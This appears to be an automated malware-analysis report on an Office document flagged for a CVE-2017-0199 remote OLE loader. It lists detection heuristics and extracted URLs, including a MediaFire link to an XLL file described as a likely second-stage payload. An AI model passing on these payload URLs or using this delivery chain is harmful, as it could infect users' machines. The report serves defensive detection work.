MALICIOUS
82
Risk Score
Malware Insights
MITRE ATT&CK
T1204.002 Malicious File
The sample leverages the CVE-2017-0199 vulnerability, indicated by the OOXML OLE2Link remote loader heuristic, to fetch and execute an external OLE object. The primary IOC is the URL pointing to an XLL file, which is likely the second-stage payload. The document body itself contains no actionable content, but the heuristics strongly suggest a malicious download and execution chain.
Heuristics 3
-
OOXML OLE2Link remote loader — CVE-2017-0199 related high CVE_2017_0199_RELATEDDocument contains an o:OLEObject Type=Link whose external oleObject relationship points to a remote URL. This is the OOXML OLE2Link activation shape associated with CVE-2017-0199 delivery, but the local file does not expose URL Moniker bytes or a weaponized extension/content type, so the exact CVE cannot be proven statically.
-
External OLE object relationship high OOXML_EXTERNAL_OLE_OBJECTDocument contains an oleObject relationship whose target is an external HTTP(S) URL. Office resolves this through OLE/object update paths rather than as a normal user-clicked hyperlink.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://www.mediafire.com/file/8qv8nzje8wymhaj/excelDNALibrary-AddIn64.xll/file
- http://schemas.openxmlformats.org/markup-compatibility/2006
- http://schemas.openxmlformats.org/officeDocument/2006/relationships
- http://schemas.openxmlformats.org/officeDocument/2006/math
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
- http://schemas.openxmlformats.org/wordprocessingml/2006/main
- http://schemas.microsoft.com/office/word/2006/wordml
- https://urlcallinghta.blogspot.com/atom.xml
Open this report in the interactive analyzer, or submit your own file for analysis.